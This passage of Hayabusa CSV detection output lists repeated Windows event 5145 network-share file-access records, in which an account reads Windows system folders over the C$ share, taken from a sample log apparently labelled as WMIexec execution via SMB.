+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.447 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 
